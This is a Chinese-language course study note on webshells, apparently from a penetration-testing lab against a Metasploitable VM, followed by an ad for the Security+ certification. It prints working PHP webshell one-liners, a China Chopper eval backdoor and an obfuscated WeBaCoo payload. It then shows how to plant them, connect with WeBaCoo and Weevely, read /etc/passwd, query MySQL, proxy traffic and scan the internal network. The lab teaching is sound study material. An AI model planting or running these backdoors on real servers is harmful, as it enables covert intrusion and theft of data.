【安全牛学习笔记】WEBSHELL

时间:2021-12-21 21:26:55


WEBSHELL                                    

<?php echo shell exec($_GET['cmd']);?>      

中国菜刀: http://www.maicaidao.co/          

    <?php @eval($_POST['chopper']);?>       

可能被IDS、AVWAF、扫描器软件发现查杀      

WeBaCoo(WEB backdoor Cookie)              

    类终端的shell                           

    编码通信内容通过cookie头传输,隐蔽性较强

    cm:base64编码的命令                     

    cn:服务器用于返回数据的cookie头的名     

    cp:返回信息定界符 

webshell 

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

root@K:~# ssh msfadmin@192.168.1.115

root@K:~# vi a.php

<?php echo shell exec($_GET['cmd']);?> 

msfadmin@metasploit:~# sudo cp a.php /var/www/

[sudo] password for msfadmin:

msfadmin@metasploit:~# ls /var/www/

1.php  dav    index.php   phpMyAdmin   test      tikiwiki-old

a.php  dvwa   muillidae   phpinfo.php  tikiwiki  twiki

http://192.168.1.115

http://192.168.1.115/a.php?cmd=id

http://192.168.1.115/a.php?cmd=pwd

msfadmin@metasploit:~# vi caidao.php

<?php @eval($_POST['chopper']);?>

中国菜刀工具

http://192.168.1.115/caidao.php         chopper

php    utf8

msfadmin@metasploit:~# ls

a.php  caidao.php   mysqlaccess.log  vnlnerable

msfadmin@metasploit:~# sudo cp caidao.php /var/www/

[var/www]$ netstat -an | grep BETABLISHED

tcp      0    210 192.168.1.115:80        192.168.1.122:49245    BETABLISHED

tcp6     0      0 192.168.1.115:22        192.168.1.119:38900    BETABLISHED

udp      0      0 127.0.0.1:47869         127.0.0.1:47869        BETABLISHED

[var/www]$ id

uid=33(www-data) gid=33)(www-data) group=33(www-data

[var/www]$ pwd

/var/www

[var/www]$ cat /etc

WEBSHELL                              

生成服务端                            

    webacoo -g -o a.php               

客户端连接                            

    webacoo -f u http://1.1.1.1/a.php

其他参数

-----------------------------------------------------------------------

[课外拓展]

WeBaCoo (Web Backdoor Cookie) script-kit是一个小巧的、隐蔽的php后门,它提供了一个可以连接远程web服务器并执行php代码的终端。WeBaCoo使用HTTP响应头传送命令结果,shell命令经base64编码后隐藏在Cookie头中。

官方介绍:

Since 0.2.1 version an extension module support has been added in orderto provide extra functionalities to WeBaCoo. Within terminal mode youcan execute ‘load’ to list the available modules and initialize the desiredone from the list. By typing ‘unload’ you can restore back to the initialterminal mode.

Available extension modules:

    o mysql-cli MySQL command line module

    o psql-cli Postgres command line module

    o upload File upload module using HTTP Post

    o download File download module using stdout print via ‘od’ & ‘xxd’

    o stealth Increase stealth module via .htaccess handling

也是利用COOKIES传输

获得代码

root@Dis9Team:/pen/door# git clone git://github.com/anestisb/WeBaCoo.git

安装模块

root@Dis9Team:/pen/door/WeBaCoo# apt-get install liburi-perl libio-socket-socks-perl

测试一下:

root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl 

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

Copyright (C) 2011-2012 Anestis Bechtsoudis

{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

root@Dis9Team:/pen/door/WeBaCoo#

生成一个后门

上传

root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl -g -o backdoor.php

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

Copyright (C) 2011-2012 Anestis Bechtsoudis

{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Backdoor file "backdoor.php" created.

root@Dis9Team:/pen/door/WeBaCoo# cat backdoor.php 

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

root@Dis9Team:/pen/door/WeBaCoo#

连接

root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl -t -u http://5.5.5.2/door3.php

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

Copyright (C) 2011-2012 Anestis Bechtsoudis

{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Connecting to remote server as...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Type 'load' to use an extension module.

[*] Type ':' to run local OS commands.

[*] Type 'exit' to quit terminal.

webacoo$ pwd

/var/www

webacoo$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

webacoo$

查看模块

webacoo$ load

Currently available extension modules:

o MySQL-CLI: MySQL Command Line Module

    mysql-cli         (ex. 'mysql-cli 10.0.1.11 admin pAsS')

o PSQL-CLI: Postgres Command Line Module

    psql-cli      (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

o Upload: File Upload Module

    upload           (ex. 'upload exploit.c /tmp/')

o Download: File Download Module

    download                    (ex. 'download config.php')

o Stealth: Enhance Stealth Module

    stealth                  (ex. 'stealth /var/www/html')

[*] Type the module name with the correct args.

>

连接Mysql

他给出了帮助信息 例如连接Mysql

o MySQL-CLI: MySQL Command Line Module

    mysql-cli         (ex. 'mysql-cli 10.0.1.11 admin pAsS')

测试一下

> mysql-cli 127.0.0.1 root 123456

[+] mysql-cli module successfully loaded.

[*] Type 'unload' to unload the module and return to the original cmd.

mysql-cli> show databases;

Database

information_schema

mysql

mysql-cli>

其他模块

都是一样的操作

上传文件 upload 本地文件地址 远程文件地址

下载文件 download 远程文件地址

----------------------------------------------------------------------------------------

root@K:~# webacoo -g -o a.php

root@K:~# webacoo -g -o a.php webacoo.php

root@K:~# scp webacoo.php msfadmin@192.168.1.115:/home/msfadmin

msfadmin@192.168.1.115's password:

msfadmin@metasploitable:~$ ls

a.php  caidao.php  mysqlaccess.log  vulnerable  webacoo.php

msfadmin@metasploitable:~$ sudo cp webacoo.php /var/www/

msfadmin@metasploitable:~$ ls /var/www/

1.php       dav        muilidae     test          twiki

a.php       dvwa       phpMyAdmin   tikiwiki      webacoo.php

caidao.php  index.php  phpinfo.php  tikiwiki-old

msfadmin@metasploitable:~$ webacoo -t -u http://192.168.1.115/webacoo.php

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

Copyright (C) 2011-2012 Anestis Bechtsoudis

{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Connecting to remote server as...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Type 'load' to use an extension module.

[*] Type ':' to run local OS commands.

[*] Type 'exit' to quit terminal.

root@K:~# echo Y2FOIC9IdGMvcGFzc3dk | base64 -d

cat /etc/passwd

root@K:~# webacoo -h

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

Copyright (C) 2011-2012 Anestis Bechtsoudis

{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

Usage: webacoo.pl [options]

Options:

  -gGenerate backdoor code (-o is required)

  -f FUNCTIONPHP System function to use

FUNCTION

1: system (default)

2: shell_exec

3: exec

4: passthru

5: popen

  -o OUTPUTGenerated backdoor output filename

  -r Return un-obfuscated backdoor code

  -tEstablish remote "terminal" connection (-u is required)

  -u URLBackdoor URL

  -e CMDSingle command execution mode (-t and -u are required)

  -m METHODHTTP method to be used (default is GET)

  -c C_NAMECookie name (default: "M-cookie")

  -d DELIMDelimiter (default: New random for each request)

  -a AGENTHTTP header user-agent (default exist)

  -p PROXYUse proxy (tor, ip:port or user:pass:ip:port)

  -v LEVELVerbose level

LEVEL

0: no additional info (default)

1: print HTTP headers

2: print HTTP headers + data

  -l LOGLog activity to file

  -hDisplay help and exit

  updateCheck for updates and apply if any

root@K:~# webacoo update

WEBSHELL                                  

Weevely                                   

    隐蔽的类终端PHP Webshell              

    30多个管理模块                        

        执行系统命令、浏览文件系统        

        检查服务器常见配置错误            

        创建正向、反向TCP Shell连接       

        通过目标计算机代理 HTTP 流量      

        从目标计算机运行端口扫描,渗透内网

    支持连接密码

WEBSHELL                                      

Kali缺少库                                    

    https://pypi.python.org/pypi/PySocks/     

    ./setup.py install                        

生成服务端                                    

    weevely generate <password> b.php         

    /usr/share/weevely/b.php                  

客户端连接服务器                              

    weevely http://1.1.1.1/b.php <password>id

Help

手动下载安装PySocks

root@K:~/Downloads/PySocks-1.5.0# ./setup.py install

root@K:~# weevely

root@K:~# weeve generate pass123 wee.php

root@K:~# ls

root@K:~# cd /usr/share/weevely/

root@K:usr/share/weevely# ls

root@K:usr/share/weevely# cat wee.php

root@K:usr/share/weevely# scp wee.php msfadmin@192.168.1.115:/home/msfadmin

msfadmin@192.168.1.115's password:

msfadmin@metasploitable:~$ ls

a.php  caidao.php  mysqlaccess.log  vulnerbale  webacoo.php  wee.php

msfadmin@metasploitable:~$ sudo cp wee.php /var/www/

[sudo] password for msfadmin:

root@K:usr/share/weevely# weely http://192.168.1.115/wee.php pass123

[+] weevely 3.2.0

[+] Target:     192.168.1.115

[+] Session:    /root/.weevely/sessions/192.168.1.115/wee_O.session

[+] Browse the filesystem or execute commands starts the connection

[+] to the target.Tyepe :help for meor information.

weevely> cat /etc/passwd

www-data@192.168.1.115:/var/www $ help

www-data@192.168.1.115:/var/www $ audit_suidsgid

www-data@192.168.1.115:/var/www $ audit_fiesystem

www-data@192.168.1.115:/var/www $ audit_phpconf

www-data@192.168.1.115:/var/www $ system_info

www-data@192.168.1.115:/var/www $ cd /

www-data@192.168.1.115:/ $ net_proxy

root@K:~# netstat -pantu | grep :8080

tcp        0      0 127.0.0.1:8080        0.0.0.0*         LISTEN      6306/python

打开浏览器,代理设置成burpsuite

www-data@192.168.1.115:/ $ net_scan

www-data@192.168.1.115:/ $ net_scan 192.168.1.1 80-80

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1970013